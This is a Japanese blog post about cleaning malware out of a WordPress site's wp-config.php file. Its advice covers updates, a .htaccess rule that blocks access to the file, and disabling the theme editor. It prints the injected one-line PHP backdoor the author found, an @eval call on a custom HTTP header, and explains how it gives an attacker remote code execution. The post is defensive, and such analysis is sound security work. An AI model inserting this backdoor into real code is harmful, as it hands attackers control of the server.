WordPress マルウェア:wp-config.phpファイルによる感染

Last Updated: 2025 年 02 月 28 日 댓글

WordPress サイトはセキュリティに強いですが、アップデートを無視したり、セキュリティの脆弱性があるテーマやプラグインを使用したり、セキュリティ慣行に従わないとマルウェアに感染する可能性があります。マルウェアに感染すると、さまざまな症状が発生する可能性があります。代表的な現象として、奇妙なスパムサイトにリダイレクトされたり、奇妙なポップアップバナーが表示されることもあります。

悪意のあるコードはいくつかの経路に入る可能性があります。 wp-config.phpファイルまたは.htaccessファイルにマルウェアが注入されることがあります。

WordPress セキュリティ上の問題

WordPressを利用するサイトが増え、マルウェアに感染したりハッキングされるサイトも増えています。

一部は WordPressがセキュリティに弱く、マルウェアに感染しやすいということです。まったくそうではありません。このブログは10年以上 WordPressで運営されていますが、マルウェアに感染したことはありません。

以下の場合、マルウェアに感染する可能性があります。

  1. WordPress コア、テーマ、プラグインを最新バージョンに更新しない場合
  2. アップデートされず、放置されたプラグインやテーマを使用する場合
  3. 弱いパスワードを使用する場合
  4. admin、サイトドメイン名などを管理者IDとして使用する場合
  5. セキュリティに違反 ウェブホスティングを利用する場合

マルウェアを防ぐために、常に最新バージョンに更新し、Wordfenceなどのセキュリティプラグインを使用することを検討してください。そして定期的にバックアップするのも良い習慣です。

悪性コードに感染すると、治療が容易ではない可能性があります。マルウェアを削除してもセキュリティ対策をしないと、根本的な原因が消えなかったため再発する可能性があります。

wp-config.phpファイル感染 WordPress マルウェア治療

今月に入って何度もマルウェア治療を受けました。あるサイトの場合、サイトにアクセスすると奇妙なサイトに移動する現象が発生しました。

すべてのマルウェアを削除した後、Wordfenceでスキャンすると、wp-config.phpファイルにマルウェアが残っていることがわかりました。

wp-config.phpファイルを開いて見てみると、次のようなコードが追加されていました。

@eval($_SERVER['HTTP_83EA74D']);

このコードについてチャットGPTに聞いてみるとマルウェアが明らかなようです。

@eval($_SERVER['HTTP_83EA74D']);コードは明らかなマルウェアです。このコードは WordPressのコア設定ファイルwp-config.phpに挿入され、ハッカーにリモートコード実行(RCE)機能を提供します。 eval() 関数は、文字列を PHP コードに変換して実行する危険な関数です。ここでは、HTTP 要求ヘッダーを介して渡される値 ($_SERVER['HTTP_83EA74D']) を実行します。

このマルウェアの動作方法は次のとおりです。攻撃者が特別に細工されたHTTPヘッダー(HTTP_83EA74D)を含む要求をサーバーに送信すると、そのヘッダーに含まれているPHPコードがサーバー上で実行されます。これにより、攻撃者はファイルの削除、データベース操作、バックドアのインストールなど、サーバー上でほぼすべての操作を実行できるようになります。前の@記号はエラーメッセージを隠して検出を困難にする役割を果たします。この種の攻撃は検出が困難で深刻なセキュリティ上の脅威を引き起こすため、発見直後にコードを削除してサイト全体のセキュリティを確認する必要があります。

wp-config.phpファイルに異常なコードが追加されていると、マルウェアに感染していると思われる可能性があります。この場合、サーバー内の他のファイルにもマルウェアが注入されている可能性があるため、サイト全体のスキャンが必要です。

また、データファイルだけでなく、DBを通じても巧妙にマルウェアが追加されて見つけるのが難しいケースも時々接します。ファイルからすべてのマルウェアを削除してもマルウェアの症状が消えない場合は、データベースを介してマルウェアが植えられている可能性があります。

wp-config.phpファイルへのアクセスをブロックする

次のコードを.htaccessファイルに追加すると、wp-config.phpファイルへのアクセスをブロックできます。

<Files wp-config.php>
order allow,deny
deny from all
</Files>

このコードはwp-config.phpファイルへの直接Webアクセスをブロックするセキュリティ対策ですが、サイトがマルウェアに感染している場合、wp-config.phpファイルの改ざんを完全に防ぐことはできません。

このコードは、Webブラウザを介してwp-config.phpファイルに直接アクセスするのをブロックし、ファイルの内容が公開されるのを防ぎます。ただし、既にサーバーに侵入しているマルウェアや脆弱性を介してサーバー側の権限を取得している攻撃者は、PHPの実行権限またはファイルシステムアクセスを介してwp-config.phpファイルを変更する可能性があるため、悪意のある攻撃者がサーバー側の権限を取得できないようにセキュリティに注意する必要があります。

セキュリティのために、テーマファイルエディタ(以前の名前「テーマエディタ」)を無効にすることも検討してください。 wp-config.phpファイルに次のコードを追加して、テーマファイルエディタを無効にできます。

define('DISALLOW_FILE_EDIT',true);

テーマエディタについては、次の記事を参照してください。

最後に、

WordPressを最新バージョンに更新し、定期的にバックアップするなどの措置により、安全にサイトを運営できます。特にアップデートを無視したり、セキュリティに弱いテーマやプラグインを使用すると、マルウェアに感染したり、サイトがハッキングされたりする可能性があります。

マルウェアを含む WordPress そしてWebホスティング関連の問題で解決するのが難しい場合 ここでサービス(有料)をご依頼することができます。

参照

作者のアバター

ワードクラッカーはプロの英国翻訳家として活動しており、10年以上 WordPress 関連情報を提供する WordPress 情報パッケージのブログを運営している。また、 'WordPressを使用している人 Naver カフェも管理している。

コメントを残す

コメント

カカオトーク相談 カトクサービス相談